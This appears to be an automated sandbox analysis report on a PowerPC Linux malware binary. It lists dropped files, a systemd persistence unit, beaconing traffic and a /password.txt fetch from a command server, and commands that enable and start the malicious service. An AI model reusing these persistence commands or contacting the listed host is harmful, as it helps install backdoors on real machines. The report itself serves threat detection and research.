                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.

                                                              /tmp/qemu-open.rQm068 (deleted)

                                                              Download File
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.

                                                              /tmp/qemu-open.sAYifb (deleted)

                                                              Download File
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.

                                                              /tmp/qemu-open.sXjU99 (deleted)

                                                              Download File
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.

                                                              /tmp/qemu-open.vtExu8 (deleted)

                                                              Download File
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):125
                                                              Entropy (8bit):3.0391741549216724
                                                              Encrypted:false
                                                              SSDEEP:3:FVcYugJMLIXsLAJQVYMdSWbFNX:vbBJMLIXsLsQ3dSWbF1
                                                              MD5:9FEEAE83800D5D74A3080BAAA524BB9C
                                                              SHA1:76F979366C6755FAB2EF419DF70CA86F9BA6ED82
                                                              SHA-256:882E8F9183178EA985AFCDFA7C0D9232567F6FFCA4CB10C96CE1EC83085D8F09
                                                              SHA-512:17AE9B3736F029D251674EBAF8BFB99327CE72FDF414BF9A5E8870636744273F28686FF4112DC26B7E113F8F4BA4786B8EF2DDDA86D7199FE344B887B08A1EFB
                                                              Malicious:false
                                                              Preview:5501 (/tmp/linux_ppc64el.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 274886298736 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.

                                                              /usr/lib/systemd/system/linux.service

                                                              Download File
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):207
                                                              Entropy (8bit):4.790870113084517
                                                              Encrypted:false
                                                              SSDEEP:6:z86XWRBADMD+ns7HrDC17HrDfsRs7HrDCLQmWA4Rn:znWR2D2+nsr4rfs6rCLHWrn
                                                              MD5:D80CCC7CED99538F22336F2EC0249087
                                                              SHA1:BE4DE9F604E065B53076A3D7BA702FE98C6B8746
                                                              SHA-256:0DC3E8552C3E6217E0DC7FD440C7BA4C9CD6E676CE2561E4F71949D2783AE968
                                                              SHA-512:D798E6516571FCD03BDFFBD5405F320FB23422CEB563901658EFA4101B4568EABC27730F40C0BCF6DDE5509F01BA6965DD61F64675DAD695924F1DEA1746E6DE
                                                              Malicious:false
                                                              Preview:[Unit].Description=linux.After=network.target.[Service].Type=forking.ExecStart=/boot/System.img.config.ExecReload=/boot/System.img.config.ExecStop=/boot/System.img.config.[Install].WantedBy=multi-user.target

                                                              /var/log/btmp

                                                              Download File
                                                              Process:/usr/sbin/sshd
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):384
                                                              Entropy (8bit):0.8735982127940438
                                                              Encrypted:false
                                                              SSDEEP:3:V/aDLwbXWXVm/lX2/l:VWMbGI/Q/
                                                              MD5:9D70E6711CCDB75E9591CD6CCD456113
                                                              SHA1:8F2ABC19335C299FCCB3874B97AA33380BDB6A5F
                                                              SHA-256:E8EF7A0CD99AFB1D3C8FF88B1783C3C944A12B8C863C4734AD16DA0C2B63E16F
                                                              SHA-512:A1B9E5C5FE0C171B53D770CD4CE83F62E376541B58615F6F1A2BCA45C814E8E6E1C931051F1EC29338A226077EB02446D7331F9616A713EDF457FBCBEA2BA27E
                                                              Malicious:false
                                                              Preview:...._...ssh:notty...........................root............................192.168.2.23..............................................................................................................................................................................................................................................................Dg........................................

                                                              Static File Info

                                                              General

                                                              File type:ELF 64-bit LSB executable, 64-bit PowerPC or cisco 7500, OpenPOWER ELF V2 ABI, version 1 (SYSV), statically linked, Go BuildID=Y52nvXRmmagZPlBTD-aN/NAr5Akn8HWwmUdYC_fAB/CpqR8sVX_ghDLQQPm5P-/GAtPsar0-LeUP45KvIBJ, stripped
                                                              Entropy (8bit):5.971492382871872
                                                              TrID:
                                                              • ELF Executable and Linkable format (generic) (4004/1) 98.45%
                                                              • Lumena CEL bitmap (63/63) 1.55%
                                                              File name:linux_ppc64el.elf
                                                              File size:5'111'808 bytes
                                                              MD5:04893430bfaf82b24e726e9980c338b3
                                                              SHA1:9dfd9c35b547705b267b4c2acd5cb7699ba5edb5
                                                              SHA256:535b04d328da7b0be034710aeb74c4460c873d72ccf1e6e8186d4faf2e158c60
                                                              SHA512:c20622c1339edcba1f4df9f17876c460d42353df319ea2ceb14c8467b8a5099e264173352a226fc4d41c9a4089ff831a36accabdc2e2c9a72847bae06c2f9d0f
                                                              SSDEEP:49152:i2LzgioAq4P670Og/d6I+eFRgjpmbLQYLy28qntKyB1:nLzgioh4P670Og/d6I+wgjpaLya
                                                              TLSH:7E363942B7086FA9CA60493385B38ED117727D996F315343AB14FABEA8B63054F15FC8
                                                              File Content Preview:.ELF.....................R......@...................@.8...@.............@.......@.......@...............................................................d.......d...............................................T.%.....T.%.......................&.......'....

                                                              Static ELF Info

                                                              ELF header

                                                              Class:ELF64
                                                              Data:2's complement, little endian
                                                              Version:1 (current)
                                                              Machine:PowerPC64
                                                              Version Number:0x1
                                                              Type:EXEC (Executable file)
                                                              OS/ABI:UNIX - System V
                                                              ABI Version:0
                                                              Entry Point Address:0x75200
                                                              Flags:0x2
                                                              ELF Header Size:64
                                                              Program Header Offset:64
                                                              Program Header Size:56
                                                              Number of Program Headers:7
                                                              Section Header Offset:456
                                                              Section Header Size:64
                                                              Number of Section Headers:14
                                                              Header String Table Index:3

                                                              Sections

                                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                              NULL0x00x00x00x00x0000
                                                              .textPROGBITS0x110000x10000x25ba540x00x6AX0016
                                                              .rodataPROGBITS0x2700000x2600000xf402b0x00x2A0032
                                                              .shstrtabSTRTAB0x00x3540400xa50x00x0001
                                                              .typelinkPROGBITS0x3641000x3541000x17e00x00x2A0032
                                                              .itablinkPROGBITS0x3658e00x3558e00x9500x00x2A0032
                                                              .gosymtabPROGBITS0x3662300x3562300x00x00x2A001
                                                              .gopclntabPROGBITS0x3662400x3562400x1496000x00x2A0032
                                                              .go.buildinfoPROGBITS0x4b00000x4a00000xe00x00x3WA0016
                                                              .noptrdataPROGBITS0x4b00e00x4a00e00x310d80x00x3WA0032
                                                              .dataPROGBITS0x4e11c00x4d11c00xb9f00x00x3WA0032
                                                              .bssNOBITS0x4ecbc00x4dcbc00x381a00x00x3WA0032
                                                              .noptrbssNOBITS0x524d600x514d600xf8100x00x3WA0032
                                                              .note.go.buildidNOTE0x10f9c0xf9c0x640x00x2A004

                                                              Program Segments

                                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                              PHDR0x400x100400x100400x1880x1881.50120x4R 0x10000
                                                              NOTE0xf9c0x10f9c0x10f9c0x640x645.30740x4R 0x4.note.go.buildid
                                                              LOAD0x00x100000x100000x25ca540x25ca546.12980x5R E0x10000.text .note.go.buildid
                                                              LOAD0x2600000x2700000x2700000x23f8400x23f8405.34560x4R 0x10000.rodata .typelink .itablink .gosymtab .gopclntab
                                                              LOAD0x4a00000x4b00000x4b00000x3cbc00x845705.26070x6RW 0x10000.go.buildinfo .noptrdata .data .bss .noptrbss
                                                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                              LOOS+50415800x00x00x00x00x00.00000x2a00 0x8

                                                              Network Behavior

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 25, 2024 23:47:09.943927050 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:10.064049959 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:10.065028906 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:10.791604996 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:10.911607981 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:11.652710915 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:11.652724981 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:11.652769089 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:11.652769089 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:11.685997009 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:11.696206093 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:11.806006908 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:11.816184044 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:12.498842001 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:12.498893023 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:13.507561922 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:13.507639885 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:16.717216969 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:16.717283010 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:18.955446005 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:19.075684071 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:21.723813057 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:21.723870039 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:26.726015091 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:26.726078987 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:28.694283009 CET47700808192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:28.814431906 CET80847700103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:28.814492941 CET47700808192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:28.847290993 CET47700808192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:28.967298031 CET80847700103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:28.980860949 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:29.101035118 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:30.432127953 CET80847700103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:30.432183027 CET47700808192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:30.687267065 CET5319822192.168.2.14192.168.2.1
                                                              Nov 25, 2024 23:47:31.738260984 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:31.738331079 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:36.744508982 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:36.744571924 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:38.996334076 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:39.116504908 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:41.753885031 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:41.753958941 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:46.764223099 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:46.764339924 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:51.767396927 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:51.767617941 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:47:56.771615028 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:47:56.771750927 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:00.431859016 CET47700808192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:00.553271055 CET80847700103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:01.778757095 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:01.778881073 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:06.783572912 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:06.783754110 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:11.795192957 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:11.795726061 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:16.802113056 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:16.802301884 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:21.808976889 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:21.809382915 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:26.822876930 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:26.823084116 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:31.134639978 CET47700808192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:31.254910946 CET80847700103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:31.836054087 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:31.836178064 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:36.852710962 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:36.852826118 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:41.854557991 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:41.854819059 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:46.862015009 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:46.863245964 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:51.875219107 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:51.875399113 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:48:56.881001949 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:48:56.881314993 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:49:01.849447012 CET47700808192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:49:01.895668030 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:49:01.895884037 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:49:01.969445944 CET80847700103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:49:06.900502920 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:49:06.900757074 CET4241252462192.168.2.14103.135.101.78
                                                              Nov 25, 2024 23:49:11.900351048 CET5246242412103.135.101.78192.168.2.14
                                                              Nov 25, 2024 23:49:11.900505066 CET4241252462192.168.2.14103.135.101.78

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 25, 2024 23:47:09.037570000 CET5255053192.168.2.141.1.1.1
                                                              Nov 25, 2024 23:47:09.177530050 CET53525501.1.1.1192.168.2.14
                                                              Nov 25, 2024 23:47:09.631686926 CET5158053192.168.2.141.1.1.1
                                                              Nov 25, 2024 23:47:09.770894051 CET53515801.1.1.1192.168.2.14
                                                              Nov 25, 2024 23:47:09.795734882 CET5255653192.168.2.141.1.1.1
                                                              Nov 25, 2024 23:47:09.800288916 CET3307253192.168.2.141.1.1.1
                                                              Nov 25, 2024 23:47:09.935331106 CET53525561.1.1.1192.168.2.14
                                                              Nov 25, 2024 23:47:09.939930916 CET53330721.1.1.1192.168.2.14

                                                              ICMP Packets

                                                              TimestampSource IPDest IPChecksumCodeType
                                                              Nov 25, 2024 23:47:30.687306881 CET192.168.2.1192.168.2.14828b(Port unreachable)Destination Unreachable

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 25, 2024 23:47:09.037570000 CET192.168.2.141.1.1.10x2080Standard query (0)www.google.com28IN (0x0001)false
                                                              Nov 25, 2024 23:47:09.631686926 CET192.168.2.141.1.1.10xceb1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                              Nov 25, 2024 23:47:09.795734882 CET192.168.2.141.1.1.10xef07Standard query (0)aras.liveya.org28IN (0x0001)false
                                                              Nov 25, 2024 23:47:09.800288916 CET192.168.2.141.1.1.10x77caStandard query (0)aras.liveya.orgA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 25, 2024 23:47:09.177530050 CET1.1.1.1192.168.2.140x2080No error (0)www.google.com28IN (0x0001)false
                                                              Nov 25, 2024 23:47:09.770894051 CET1.1.1.1192.168.2.140xceb1No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                              Nov 25, 2024 23:47:09.939930916 CET1.1.1.1192.168.2.140x77caNo error (0)aras.liveya.org103.135.101.78A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • 103.135.101.78:808

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              0192.168.2.1447700103.135.101.78808
                                                              TimestampBytes transferredDirectionData
                                                              Nov 25, 2024 23:47:28.847290993 CET123OUTGET /password.txt HTTP/1.1
                                                              Host: 103.135.101.78:808
                                                              User-Agent: Go-http-client/1.1
                                                              Accept-Encoding: gzip
                                                              Nov 25, 2024 23:47:30.432127953 CET213INHTTP/1.1 200 OK
                                                              Accept-Ranges: bytes
                                                              Content-Length: 16
                                                              Content-Type: text/plain; charset=utf-8
                                                              Last-Modified: Sat, 21 May 2022 20:57:32 GMT
                                                              Date: Mon, 25 Nov 2024 22:47:30 GMT
                                                              Data Raw: cb 5e cf 60 9d e0 4a 51 15 21 27 9b bc c8 4c c8
                                                              Data Ascii: ^`JQ!'L


                                                              System Behavior

                                                              General

                                                              Start time (UTC):22:47:03
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:/tmp/linux_ppc64el.elf
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:/bin/bash -c /etc/32678&
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:-
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/32678
                                                              Arguments:/etc/32678
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/etc/32678
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sleep
                                                              Arguments:sleep 60
                                                              File size:39256 bytes
                                                              MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:service crond start
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/basename
                                                              Arguments:basename /usr/sbin/service
                                                              File size:39256 bytes
                                                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/basename
                                                              Arguments:basename /usr/sbin/service
                                                              File size:39256 bytes
                                                              MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl --quiet is-active multi-user.target
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl list-unit-files --full --type=socket
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/service
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/sed
                                                              Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                              File size:121288 bytes
                                                              MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:17
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl start crond.service
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:06
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:/tmp/linux_ppc64el.elf
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/update-rc.d
                                                              Arguments:update-rc.d linux_kill defaults
                                                              File size:3478464 bytes
                                                              MD5 hash:16a21f464119ea7fad1d3660de963637

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/sbin/update-rc.d
                                                              Arguments:-
                                                              File size:3478464 bytes
                                                              MD5 hash:16a21f464119ea7fad1d3660de963637

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:08
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl daemon-reload
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:19
                                                              Start date (UTC):25/11/2024
                                                              Path:/tmp/linux_ppc64el.elf
                                                              Arguments:-
                                                              File size:5448264 bytes
                                                              MD5 hash:e179f86e81efbe80815812cd0b663076

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:19
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:19
                                                              Start date (UTC):25/11/2024
                                                              Path:/bin/bash
                                                              Arguments:-
                                                              File size:1183448 bytes
                                                              MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                              Chronological Activities


                                                              General

                                                              Start time (UTC):22:47:19
                                                              Start date (UTC):25/11/2024
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl daemon-reload
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Chronological Activities


                                                              General

